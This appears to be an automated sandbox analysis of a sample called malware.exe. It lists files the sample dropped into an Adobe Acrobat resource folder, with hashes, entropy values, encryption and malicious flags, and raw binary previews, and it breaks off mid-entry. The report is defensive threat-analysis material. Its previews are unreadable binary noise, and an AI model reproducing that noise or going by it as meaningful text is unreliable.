..$a.....6Z....>..[m..A.<.)..Sq.......Y........,......@....9Cg...M.i..=t..p..,s...T....q...IZk..e..!j....Q0.w.w......n...Z.K"m.O.m=.*).C../B_..M..h?.._.%...a....[X"..G)BA.D....N..-...l...9...3.s...........K`.Sg.$uM..3&....""xJ.A..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\229192ba6f3c6a8d242464d646d4ad63.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19951
                        Entropy (8bit):7.9914168720397605
                        Encrypted:true
                        SSDEEP:384:3WvVbsNqm05nl5Wdep88JQWsQtt1IYHbLAjFylma5VcOkhcBpGiHUcaOvaurWuz7:GdbTm0r5YO9tth7LAjAAajYcnaTurVCA
                        MD5:FAB0C2F54A7B8FB92CC95864B283AC8E
                        SHA1:AF4A10E9640C9F37A63B0EBC8274B7B76D9DF759
                        SHA-256:72F2807022FE131C26506CCE166A25176190D1EB1FC74C098ADC3AA7FC2691FD
                        SHA-512:AC45593B8227526C3C351D044BF6AEAA1C28B3794B30C1243BF8BD0FEF8428C6155BCAD9AB0A457CEFF479155D92D3FDED9C31C2606C3149B20F04704CA3FBA3
                        Malicious:true
                        Preview:.....mo..>.I...Bh..v.R..z5..(wbl....k*dW.`.I"..}Ys...)..).Ec&....G/IXK..D.D..@d..Q.T...0s.o.......Y..x....z.d`..R....:?.XU../U. $. .K!..\[..hJ......45n........?M..(.>...}..[....%8R(H.7........j.O..=......3.[tP(.G.s;~'....s..i..I.....n>+.A...w...f.*..h:..2.....]...0.....c.2.7.....N oG..`iB.A^1._........Ws(V...A.Z...7.%.z..m...C.(..P...j..D3b.....D....S..R<..-=q...F.(.3..H...d....0D...8zs.K~.@f...&0..0...QG.....]I....q..lO..[.7X...j..T..mBw.T.......l..Pq.Y^......K..c.o.iC. ..br:....AnkC....dt...e.WM.J....J..g.x>.b...A..K.X....F.a9ew...7..B..t.?.Y.p.~}...u....O....O...D../...{.d.%Z..N.SK. .I..=.g.k~.....?cu...gtV..c...@.O....#.Q..A.e..1.-....._.....%79..a'..1y.H\... .L2>.....z&.P....a.......1)......K.@...xF<.).....{.....rf3...c....JJ..y.a..l...SA...l.......#wt..2.L.T.]C5$...I..x...........,$....a....E"..y....G.8...Q.!X..\.v..M....I...\..-:pr..].l..j..s\..j..V.....*-.`....A`.~...1....."C.r...A.....?....9Z...W.F7...P..4bXc.m5 [b..`xu..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\2458-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12265
                        Entropy (8bit):7.983937295756979
                        Encrypted:false
                        SSDEEP:192:d6ynq5oudDOaQtqZlAAT3m5mi8D0zCTdu4BtH4lMEYP/WtrsPFVWuntl3msJKSoD:d6ynXR433bMT8aIQlMtGtrsPFVWunAT5
                        MD5:3E4F953F930581BD047E19193EFD20E4
                        SHA1:C2F81FF5E4CD82763CC18613AB9A20892774E388
                        SHA-256:2B37CCB0B3979B0E33168A2D4F3BF76542063F333B584FEA950B616CA84B5A5A
                        SHA-512:4CEDF52FAF026D78F6B470D820522E19F37D71E722215181C59FEC11D7925D56976CD8A4C983B5E6B7486619B1B50DFBC60F307C458F0ECE2F80BC3CB4D2FA7C
                        Malicious:false
                        Preview:*..%..:..f.'z.Xy....p\N.fa.O......6..*3.R9X.8...{......a:.,y.l@.$..?;.[..a...|8.T.....b9+.Q...[....ms.".p..~.3s.T-.$4E.*.b.R..3...s..O.t+.k9w..U...mi..y..........q~.=J.+..]..).=Y).8q.7..a.r.h.L^L.YS.Xz..........{...I...~j...gX..Yc.....k..g....&...P.....b..2f...b.U...[|.iM.9~5(..LG.<.......j.[h...6w.&....ze.!6.........C.I0...A=*..U....7Cf....1..};..#....$..C...`E..\i.+..SU.......c_..\.x....c....gXV..]...J.W.......u..\..w.........]s..:.z..g....(..(..y.........+.DRr.8.F..O..X...U[Y...y..+..'..m......n....}.)7t.>...Sp.r....1......6;]..2..y$..0.j.~....-.......&.{Z.............p.Vv....7.,...d$\#.Dg.r..7.6..PM....K<..(..u.....8..7.NYU..%xF....G........}.F..F...K.*^.1...C.N.R..-..'>.w/..Ra.gr1.....V.......i.....8}....$J.D6.o>B.w8.t~z..8.g.4.}0...cA.?L#...;5....i.IP.z...HK@...n..34. .p.K.k..!....I(..3S8t.....>.g..F..W.P'....E..".t...cx..z.L..m.W....(iY;H.M.-..X....*..g.7...6kd.....Y...0..DG.........*."...Y..F^........W.'.2.*.=.....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\3379-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):209701
                        Entropy (8bit):7.995839497515673
                        Encrypted:true
                        SSDEEP:6144:PfaDnJ5/jWmZHiLXgqPkKyp6zZtnMGj2W8MZ/2yH:XaDJB/SwqPk9pgZt1jFVOyH
                        MD5:407BE4161156E823B210296B38ED96FF
                        SHA1:1BDE961C0C6B7E1899A064102412F38C26BA07CB
                        SHA-256:CA6386438DAF33666BD12E4D308235F933D0549209B2393F8E6CE62DD978A07B
                        SHA-512:3ED0FEC16C8D4F07C4F05F760DCCF382F80DB92C24C5859B05A7A0589406B16664395FFB26B2B777FAF183BCCE522DC28E72E19581FE252AB9ABD848736B2EF6
                        Malicious:true
                        Preview:..X..Yw....F..x.-.`.kQ.F8.[.+l*.H.x...)..5KN.&...o....{b.'i.......`MjmY.\.BXc..~.'e.Sh]p.....p..t|..@..B.<.j..W....*e..t.0.d..;.D.u.y.....U....*...K..9F....,.p....?.@...>.y..:'z.A..ZJ.s:T...v.&.v....y:.-%.`.J%..v..[...1.w"...:...`..]..#7%XtL........{..Qm....J.....g.....`.R|..X.`......Y...Z.><x<.+..=2:,...O.....jxx.+'...\..7..~.......H.....K....K.]...w3........n..j.d.Z,..7.|k..\.P.......0A p..Sg.;.....i.p..5........-Xv..).F..n.S...q2Q......S...sD.....t.U.tE%.7.JV[/!.l-.3...."m.5.}&..R.ep.Ej....d'....)\b7.3....FL=..k.Y:71?b......&.}.h~.c)BR>s..0{a..9.Q...-.#.~)}.&.rJ^.6w.#.F.q.I.^n?=10.0..G.(.\b~... E....v}i|s3ym.m.Vz3..@..V...U.W"1..S.G..E.H..X+.W..b.[.J..:...sKO.........B._..X..8.......sKI.O..:C.......:..>..'.c.0.E.....S! 9\[.:.b.n%.,.Z....2%K...J.(..(...n.IC.(O..d..;}@...kzT.kh.p`....>.8%.g.....i.......!.4&.nb...{m..\f.........t0...@T.v...i.V....*R.*A...+5.eR...{l.;$...x......a..1.5..S.e~?......H..0s'../.>.....s..t.x.....~Z...K....#..Q.C

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\355f832ee6b21ce50f0d326b48af976f.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17802
                        Entropy (8bit):7.9885933463399335
                        Encrypted:false
                        SSDEEP:384:xHdChGM5Y+Frth4+0pdU+BGhsWDUCQDXSUh6yohjLU4Kl:xHdCnF90kvhsWdeSE6NQ3l
                        MD5:77F59E8095E3AB8846C129CFD353C8B3
                        SHA1:45D77C0898981FE2E4037F35E3B9EB955962897D
                        SHA-256:5E18A1061195C8742B1E958B024DB1429CEEA0EBD70EDA68C157EE2CEBDEA038
                        SHA-512:1528805185A12201FFA4B28591D2F535BBEF20A7ADA212F7077F5FB8309F3C38A56F19AF52569753B0BD1FF702C2BD254015F95CE21790562A773E71EBBE68DB
                        Malicious:false
                        Preview:.p.cm..@kZ.e..o....}xMU.c.qg.[..BM..X..*.&.g.vce0G...f...p$...0......p*.:|=..C,.............._...u....j&..H.t...k...;c..P]..Bjf 0...,...+p...}W.0N.59>Hn....K.C..|..n.)V.h...1...:x.U...[..Wa.>.$h;3W./_..h...3..+...t.#..Y..\....^k0..|s2..fq..OrU(O.!.z...yH]#..;... W..j.3.P.L{v..R....._1......t..t......Ut&\..c_Es..~.."Y.d`...!`..#...n.".D..p....k.h?..|.HW.3"w.. ..._...6...u=.Qx7B....C..[s...5..2K...t`..f.....E.mP..../..e...].L...,.fK,9...J.. ......}...O.....w...X..^...`.......tp).D"...X.@.y...Dg.u_z.n.g....)......m.5s.5..:.A........|?+.X.p..Ro..+......&S...WU)...^..E.M.A...678...\..{.(.$.}.yY......"R|9...9.H.....W.........cmj(.|./@L..} .N.!.W.4.Q.FS.._.......p.X..?`....T.]..~.P.!....N.."..Y~...h...../...0.5O.<"..h..<i.<.Z...y..."ms.|..gi....s.....W.d.I..}..j...K.s....RY.....9Of.]m...N.....(+.@...=2M^+....(mu..6...W.....^x....J.e....s.Q...f...R...@.s(8?.^.....$}g.E...nz.X....J.;.`.^..."$.G...P..63$.n/..Y..f....tk_........aO..z...`~..l....R.......[

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4049-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):76471
                        Entropy (8bit):7.997341517249946
                        Encrypted:true
                        SSDEEP:1536:R+GTrNQ5k8jFN1ZzcDbIco3T1rzpltJ+DxOLhvKhbhdZvbXjjjX:t5GVzcDiT1rzplXyxOLhvKhbhPjvjX
                        MD5:DE65B00C61B0CFAF5A6B04C875445C81
                        SHA1:BE0EED7CF5041D2A82C49120724AA2A00CD24C9B
                        SHA-256:7819186DF811BB862599F2B2F1A74160199C163234E41DFB1CA18DA87EA07BEF
                        SHA-512:B4342AED6F552AF80CEDFBCAEA23EC50E78036C1466689E103D39585B2CE0538AB435D2CB5D8A0F70FFD4C972C178FCAE82D2A559F87286C504D484AAB4DC4AD
                        Malicious:true
                        Preview:.;.....Xr.)...Vt...h.......d..s..k.z.............9..hx...M...B......$.....~r..(. ..|7I.n.8...4.F.:..@.)O..N;...[..{9.j.......Y.IOz.y2.....Wk.B....5.].2.H........N...MbRe.s....1(p.O.h.)..).L.....p.zo%....Eb#D.k..K-.*w.'xO&.....M...y.@..X8...._..u.....4..J....= ...e.H;1.a.>.8.Su).8...OG...T...s.Y..Y..F...@..."|h.B...(..L.?.......N'...'.m..+....@v.D. .B.c.).)P..(<.....[.........2.....C:.f....M.!.......*y...GB.|.y..%..]...k.nX.R:Is"w.....6.g.U.<..h\....x...u=IrrY.x.=.....i...G...E.E..+..f.<.'fw..a..Hlm.{..c.=.`?Mf...Q3....c.xL......>. ..b)...p.h.R......_...lFX.T..P..%h&..vt......H...cQ{..(^.......Z.....;R..~?.o.O|.@YDI.k{.8..z..0..-.].....r...v.x#..j.......<rf....Q.l.....U....<...Q.g...N.8.Lo..5..!*..e..I.na6..^....>7E.e.....&:...g%.Ew...r^....:t.....uG...}...6.+n.#&....h.....(..ki..t.`..].....r...S{.....+Q%J..P.u....O...6+.#.}...8{8.\.b........Q`...F...kW~.....+!.Y...26...(..s.;..O.E.......8VK.}"w{.l..\.....e.S.H.........Pf.Y..Q.u.E

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4109-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):26908
                        Entropy (8bit):7.993551635108243
                        Encrypted:true
                        SSDEEP:768:glmYFuV2x6QJqNc0ETtQiyFAUpnjcKCmnwF3fwhL3IE:gpND1JttyHnjcWwBe3IE
                        MD5:2D52BD8148F827DC284615D05A7BE200
                        SHA1:F0649D5E4C786A92DA7F9F92BB45568FF7C9DC36
                        SHA-256:0672E15FBC86B7E1308F6CD25C89C45128E279D80B3A9ECFB689F3787506F407
                        SHA-512:0CE29BEBA8EC73E01A72E5BEB47B28BD4FD3189A52409A3CFB5C6FA97FC2244F237BB7390C61DB308B663FDD5D4B2EC2E775EC720B587899A211055136841962
                        Malicious:true
                        Preview:.'4.|s+6..g&d....E....d.0..L.Hi].....!..@.}.;\....K.^.)........S.....=%.2...U.}.p6h_q.h..7..du...C0 i...C.'...Db..8....6K0...fB..%..^ME..V.>....'.IH.^.t...|tp y^|...v.-..|..@M...s..v..o......K...)....d......_k......M....R..uC.N..[<..{.,.bX.#...&.O.MU.2...gX@.'m..i=....\'[.=...W....!D....r88..+n..x.7.f. ......N..y.op....."gq1.....jH...!$...#..t.d;0.C...$$e.C}....S.".7[3.r\...*s .a.,..kQ..,.RF...Dd.P7W...^.[...nS.)......l..../..1E|.....U..C.......-.....3.?...$."......>r6.<.3.....0.....T.R.Vl......:>.R........Tf..W.....~i.....1..Z"9..F_.!.E..I........-HM.....7T.2...M.b.O`..B...S.'.T..7...A.8..&.k.*..Ft.0..|.&..n.W.J..;..[.'..J}8....._.?3...).._..}.7R \...a^......BV.,.N.sQ.....ny'.4s.6.'2./C7.5..w.Q..>.r...q.s..)....K..H.6..h.]....[}..\...6Et...a.......(.N...wZ..d....z.d...../7.q...n..y..rSm.J..BM.M........L...Y...b7..mA...Q.c2X.G.o\r.wU..\zn.k b..U3.Xn'm..I...;u}....Tmh#....:.....<..............n....h...3.....`f.@/...>...t8U....i...H1....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4431-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10637
                        Entropy (8bit):7.978601178728442
                        Encrypted:false
                        SSDEEP:192:HMVkhFbuLSvUmqRbSOh+ZmMuK9u27Gorue4UzRLMiLrqHyfeEJV/B:/hJu+vUmGSIGLuK93hCe4UzRdLrqKeez
                        MD5:AA3759BD802D88D88D3471A98D81E970
                        SHA1:BAE695474D70C4C13424A672777173221A28EBDC
                        SHA-256:B27531585AF3910ACC426A69315E993465721F279D2371F2C61E09C3DB334A16
                        SHA-512:3A71D376C20FC9DEE6DC3806EE28E50B9A7C5BD8E5157D0D0F375A911166A2E1C7B2AFA25A1A25A168FC22C02FF1BBC340E3F5BE74186CE864449410D2855BAD
                        Malicious:false
                        Preview:+`Nq...4.&$....o.\............h....1./.y$..)...`..7+l^Y.{5..8.H\.............nO\U.....K.q...TI.....w....d.....2....3.0..A-....XCd2uT....2.K|#a.M./...u.Z..M.W+..m.w.;.q,....H@.....!.{....Q...,..A....K...:'3.8.k2y..@....U.[W. w9NE.5........x{.......q.f....;..ne.Y.baP$.~...2...c....5.y..a..._..U..a.3RJ..y.G....kx..".Tx..mIwP......7I....8...]....DxW&..=y5O.Q.+.h.*#.~5..;.VI....n.X._.^Z^..p`&....=O.;..u(.w..X%CK.....P."..a.+...............Lz..~..3f{z.,S.uQ.....G....HUPcs....A.M...|..a...m.......'.?,=&.C-.P-1.+.}...Fl..=e.!X[.v.1.&.....k...pDtn=..qmC0Q...=......;.>gl$.n.k.=..;$..YJMs........._.....[4.#...a.l.........a.....jj.e.?oP....8R_...Zl..W).w.<.'8.1.....m.Y.k%.{.+3.....).y...x!.K-.7....b.bt#Ia.K.Flf...}.U./..-x`s.GGZ...Q7..4.3."....Zv../z.s.}.7<X......t...p.. ..<05....x1... ..8q..#.:......./TP.JU..1_,......F..F%..a...../0|...a.B.{S*........ube/I...l...v.....^?.J..dau .....<.X.'.52.....G.<..*.$.h.........d.pK} )..s7p..+......'.>..~.]...9.q..N.B.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4911-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12216
                        Entropy (8bit):7.98459932141669
                        Encrypted:false
                        SSDEEP:192:skkG9CtEwVLpwtA34QIY77y4O/RshwKQA6o7mYVwqOGugBEh51kpkoKOIxuMGPa0:yG9SEwVLpwtTe7yD/2hwKQA6hYVwqOGh
                        MD5:95C4E8CF284297680DBDAC7ED28EA821
                        SHA1:D9D96B390ABDBA9FE47206A3A2450C7A5359C65F
                        SHA-256:51DD1D0A6F169E18224DA29DFCB0725F1D34FD984B4D453391B5E2B69468D57C
                        SHA-512:7A8695EB362C834F4B9C3D8BECAB331FD5F0E15FCD4E276B7DC74323C2BCA4BE4DD1C66E56616C9E99DACF7EE81DC062E530578BAF97C7FF22E144BF7FACAA49
                        Malicious:false
                        Preview:..9..y...|.......i...B.......k..."Z\bb..}E.u>0..l!B..H..3......=H..l....n..M.._.W.Qy3N.)..9.......#..e..U.......*..../+..4t.=P..FH..kI...W:_#6.*C.`_.&..._..0.n./P.]..9..HW...h,...<$w.q3Q..7.#gZ.....y......!>......|{...FY...$l...l9...V.<_...&<.mU.XO84z..FOT.h{..!.v.Dp:p..R..}C.".............E.[H....r.*...tF_sG...*..<..r...8.<........C.M..I......t...G..V.ia...".f...S...s.0~..Y...t...?.....|....d.S.....KJ.[..I..l,.....>......uQm.(.h^...}3....T^Ov.P.~.R.mo....%k..hS.......?.%....X.W..k...../..Z^.........2.]..`/P.qx6...D...F.......{...d!....u...r.h..G.u.D_...c.I.)..1.l.8.}Z.%..6X).cB...3b.......h,Sh.....H.kc.4.........l=\_.u...0.+/.O.9.&#.`.u.KR...s..;^.....|.Y`..j......h....<..E7L.....%>A.._..l.>.......O..n.=u. $`Ox..*.>&cw..a.......s.+...8C.t........E.F....u.i..c.....54.k... .......,.ud.a'...l`.h......L..g-$.f.z...O..G........<{.0(Jsx.b7...e....]p_.=~Q~.b....Y&........v....._P.L>8..#.1X!..>lD..^A.Y.w..[.:X.c..u,...7.[...'....9.>.(2....W...cC...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4dddbe6058a486f7048673e4b143f7c4.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19984
                        Entropy (8bit):7.992292057970382
                        Encrypted:true
                        SSDEEP:384:6AK/hjKUaha/y2e1hb70Km3dqiuosZsSh2xU/xVnE9RyduuG:bwjDzKb4KExuJsSh3rgRykuG
                        MD5:3F1A94DCCB60F0F0FD9C1F816E020DD5
                        SHA1:659790AEE95BEE3397BBE0B05FBC5A97EC9FE728
                        SHA-256:000D2570FCCDC6E954020656556CA3FE7DDF6970FCAEBAFA634DE53D6CAA1FCF
                        SHA-512:416E3093B24DD215A4C7D115A621906B0BCBC679DC3FA57FB8F82DDB7D50289E083B46C3E523ADC7B2083734A30FA8BD7E3EDABA779255C6D874AA120C47E8B8
                        Malicious:true
                        Preview:.k......U2..;..<...k...7.....K.ka..D.}<5.F..Y......."......O......F.y.M>.....U.....{.......<[..t...Rx.=....3..7&.{...L-.oC|[.N..k>..j....U.<....o6.u..<.....3.zL<;.\<....W..F......y.?.8.vW....#...,..f..y..5=Nz.7:...Q.5..Z{..mc. .F9!..p....J[....5......J.%..|.].C.......?h..C..%.z..F.....b.......u..'`.7...@...}S......;.h......#.3.@.O....[h.......i.....6...[.>N....Y..5\6<oJ|m(..Z4..b..|........jWj...<(..f.5.L..l..'...X...34..z..c..s..{.......EcS).|W..|W.0!/.....#..3......c2..;.7......k.T.K.....OQ+.........u..NUx..DT...352.@l.....|.....W....;.*....>W..1..A..Q.9.h..u$.k....>f..lu..E .wT(..(jG...t..H...........z8.;....s.........Y.U1.0.....?.c6...9....w.$}....D.....v.....'..0w....CP.....a..K..J..<F.(.a.P...`......qM...u@...>....c..zp...KD....Ed.jn.rr..+5[.X..?pR.Y.l....\..D}...+6^.... ...uq..G\V7=..6i..(QAH.....Q..@.J.....%.....F.T...+....U..2...5.,..).w.S.k......I9..7N=$b..js.:...W5g...>Yb....nf.a..f|.,..6!...)KQ.8.......*..,i..c.6...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\5251-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):30238
                        Entropy (8bit):7.992373291225102
                        Encrypted:true
                        SSDEEP:768:wKTbpLTcUffAXM4osW4zdYhAhljSSy0/0o:wcckfX4oDXiuO1
                        MD5:1350E27697EB673BDC0D5EA0929540F0
                        SHA1:E6BBF89781A280A27DF468D19D05FC7162407417
                        SHA-256:10633771B4ED076C9CDB184C329DDA764197B3075BED7A994F7F5408ADC90DE6
                        SHA-512:9E3B737F6FEFABC0C0E3C87118DE7AAB800B9D020479854AB5D66DF0B5E7A6712E1D7D210194CCFE3F12FDB3FB961A8C7272F26F5DE329C01B7F1C9A1C802256
                        Malicious:true
                        Preview:8.-1.og..]..0X.N5...d.)S.iaN.V..".<].OG[,@.....[.G....:.v.n".^.....xS...y.....g........|..ro8..{.(NB.q*..&.6}-..2....v....7\.........{N..b.PngT..\.G\.).zb.w.0..Sc..}~j..X..21?.V.p...h...vCQ....t......1.)...Ot'...<.0..3....W.^.:t.I.N.%.....0./58...O.R....\8..P...is.N5......H.{..I.#.2W...?M9.w.."F....w.I..;.4..._..!_(Vhq&.<%i._...(..q...`...!C..o6.ZX...aQ............nlcH.'WnY..&..M.]...]..XC.[e......u.".....$..P...Rq.OZ.*.E$...jQ...W3......1o....!Y@.G....J6.cr._GN..K.:0.)l..F.............twP.]..=..r...*.W!z5..P..T.Yi...u.#1,u.x...\~9U....Mt.Jf.7.(.%;B..W.D...r... .c#...V.m.}")uR.....d..k.m..2..../...$5..%.|vs..33....`.Ui,....,..RA....sL...V.<yk-.\F2Z.....4.....}..\.h...V./[..!.U.....B7..m..*.]s..b.\...[......i.}..)^.......b..3..m.U.\4.V.o..uY.*."O.#..D.:....=@T.a.=J.qF.....c[.J%..y....2).A.....OK..^Yy...i).|.nv{...g.7@i.^.I42.S^........K..`k.-..;!.3..[F8...8....|?.......0.5........QUat..-}Fe.P..!.|.Me....[g.n4N.`k...?.9&Z....G1....oT...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\5555-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12265
                        Entropy (8bit):7.985446730076863
                        Encrypted:false
                        SSDEEP:192:ACYMS7GPrZ91vtavbvwsUbQBECTZbnUIYfHbI1Rk2SlkGtH+YWuX1yLXGUJEY25V:jrS7Un1o1gWECTJY/QRk2SGoH7Zu3WZV
                        MD5:D2948F36435DC6A0F08ACA70C05AFAB3
                        SHA1:351DD58855A9B3E510CB55442B884F8292C174DD
                        SHA-256:4931F0EF6B4FB1558BBEEBFB6DBF1C43EFEF34799C3864CF02AA52FD3874E894
                        SHA-512:1C96F8267985AFA2C3E907CB2F3C9DA73389EC0EFCDAF96D03D4CDFA0523A005D63864C39D21DE572877CBC6099985268C912A15D8694B6D237D9436EAF83982
                        Malicious:false
                        Preview:.~ .C.o .u..-..fT&uF....F.ks.&.q.uE..-....)....u.(...9`D..2.C..p9.I..82DR+.4..6...a..m;A..q...IU.Ftq8....M..Wys.8?,....'aMPf..Q%)...2x^I....T.?.#Y.m............z...E{..........5.-.w..|..=...Z.O..w...~v`.N.T.fj...f..D....U...+...r.I./.*..{.5p.^~...K...m.u.w.Y....4...m.WV0....:.WQP...L....j..]..`.GQ<h..\.U..v..r..p.7.h...b,.@S4...F..'N......O/.o.A\..).p..Y3..U"..G....I.Qw~..>..Y.:>..f.h.....&..Rd..H(....bkJ..._c..]..X4...|..}.27~.c.........YX.....v.@zq.W.U..._!q.#..M]....Q.......s.R?...92.7.[Bn..D..uSG@.Z...Q.a-........N.0...>[5.sR'[-..E.....i@?Y"#'.'\O.}..........f....q.=.$....kvAkg7.[l0....t.?...9....\x.s.{QZ&..Z..Wh..)..A.J....q....qCOs...G.ym..%..e.%...5..<."b.EM..HuO...Z.d.^?.].W2...&q...jyI...s."!dH...E..-z.pf._.71.n)Cl.k.-.k..l..M]...'8.dy..3.....P...%4.....X. ....$./.=....V&...#..B............yBo...e..)..j...<TM)|...........4.qop.lFlek.R...}..z.$%b......L..w..1t...0...HZ*n.)...e.j....:.b[....P...h..-..y.ej...A..K..5.........0..)

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\57686c0e32e1983d524fb6f8d46ca8c7.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):270052
                        Entropy (8bit):7.999327045454286
                        Encrypted:true
                        SSDEEP:6144:dtMKcyXGCtvoYtJusCCDXn1l2kjD32qWoh56T8V4xjmjq+X0U:dtMKcaG2JjCub2I32qWh04x6dF
                        MD5:83B0D9C2C2941898E8B34F6A6E12C339
                        SHA1:A34DDEDE67729EDDFE4D607732003602C2AF20BE
                        SHA-256:9E2217875425BEDED30177F16D48932AE5B8F4EE280A3B34A51FF63E79D48490
                        SHA-512:901CF802A22C047CAF3730F350AC5025EE16737AE3CF07F7EAF704C4A3BFB32D507DC3142C89779D3C92880C34BDA9A96751B1C46D26BCB4C682B85AA579822C
                        Malicious:true
                        Preview:...-.)\.>*.N.b.5..dV...89....>0..).....l....?n.?XR.....{d.K.....N%..V.......l..O..!a..N...h..4....%....B.p....sX......ACy...$.!@........q.cl....j....Y...1. .,.V...G.V..V8..zH..A.D..z............h2u.x...tO.....hx..G)...rP.s...$t'....^.b9.....Vb.\X9.zx.....%AE_.@..I.......9..W>Kq...<L.......]..:k....o..fBDT.G...W;..i...\.t.....W..4..B.........q-_....... ..8.'..@d..w,.....K6..b..f.wH..\....T#...P&.".$.I_.V.......Z.F|..N.....mS....6..6.k4..o.#N9...Y..8 w.lC....b.(.+nR.........o'.r..J...)...{..>...,\...b~&".^D#c (.X.9zv..P.$.kK...*.Q.B..\.~..'t...OrN..5X'..XD.*.u9......2.*.i.........O..3.S..m.7<.0..].cA`).m4..-..q7x!9.1..pv%.d%1..?F....h.%BJk...#..#.0.{=.]......V:....Nn....4...l:.V........o..G3.....;.45.......Y3T.!1..y..@..a=...R..p.,...g.l.=>....*..vD#..t..Xk..f....s[.&5#A.\D.|cG~..I..o.}.O!6$.A.R/.v.L.I.......!..<..?*9.'...H.m\.h....p....*....w..8E.'.}...@HV..H95f]59.h..(....,.rr......hT=........v=Q.O}..ucS|.s..z.za....0EJ\:..1.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6297-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):93904
                        Entropy (8bit):7.998066691294285
                        Encrypted:true
                        SSDEEP:1536:MoQkmo5HFR4NB0typULCZPJlYIuubvHo/veVCqQq2azLEADiUQhft3JXBlZa0CPD:MoKsFR/8UAlpbvI/GVCVCbmZxt3JrZaP
                        MD5:554B661202C0907EF992CF458A0119D7
                        SHA1:07FEA5401B0F654E2395790F3BF51F3B31CAC0FF
                        SHA-256:78715F2653CD4F0404B2C8E6CD4D0EDB8F11C974790D5C7A1C0082DADF6CB2E7
                        SHA-512:B9C9232AD714ACF780A9413D258DFD388A0D949077190256150F32050ECCD7A7D0D1BF775AC53BDAACF60C2AD532144057CF72F0040DF0DD37AE8228967E68B6
                        Malicious:true
                        Preview:v.JT.........z4..yz.L.....u.$.......FV..."...>&.D.l\q.J.....j....V+'}...J...).....<.y.=.}.JY.o...y....LN#......5....... .)Z!..2.@_..n(.D.VO1..._[....?|......a&....N. V1.]..-.....d...g.pq.}M{....l.W.+`...xk.=...."U8......"....o.. .....w....U....>.w......o.-J.\...{..%......2&F.d{$.5.\....-....P..L^..].[..6IB.8.........z.6..>4Q....u.lU....S..th..[}..2.?.5.l6.:.('...Q8.c8..B...m..2p3Ky.. I6.aWz.B.<S.a...s.jTi...F........?....h...K).9Z..O.....#Sp.&....!...,...@u..-S9....j.. >....eO..A.....@.......W......ok.rn.v...{%......X.u4Y.....Z......;..Q{.e5.G.r...uM.........I...u.\N@......}F.#...%.vB.#.:-...L..|.7.S..t2d.k>./..i(X$J..q.|#.V...c{....u...C....,.n.b..P..C-..m..0...@."...$.:...G*.._..$..}...F....m...g./..,...n...BLz......-R!.0....?...C:U.......Z....k......1......e...A...1.h^d.+n..Wyl..G.a.7GJ-ef........."{.;...b.6.E.P=....!..,e.T9'....!.9.(......H..QS....J..t..rOz..h.>..By{.....Jb..,.[..,.3.A3...JCA.%9.+.?.....E...R.. .I.....&..Z.>S

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6665-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24397
                        Entropy (8bit):7.992719679594896
                        Encrypted:true
                        SSDEEP:384:YkbiACDfxCI7N1scNbID4Fca9E6d75r7nZgLFiq6E2fgUPpc4mmWfhn52qyT9w0G:revZpVbIDgPm6P76FiE2fgUPhLWJn59D
                        MD5:DB79FDAEB2BDFADFF92F959022DFF72A
                        SHA1:5C467E7CBD9087ADBB75436867C84FF326E37E4D
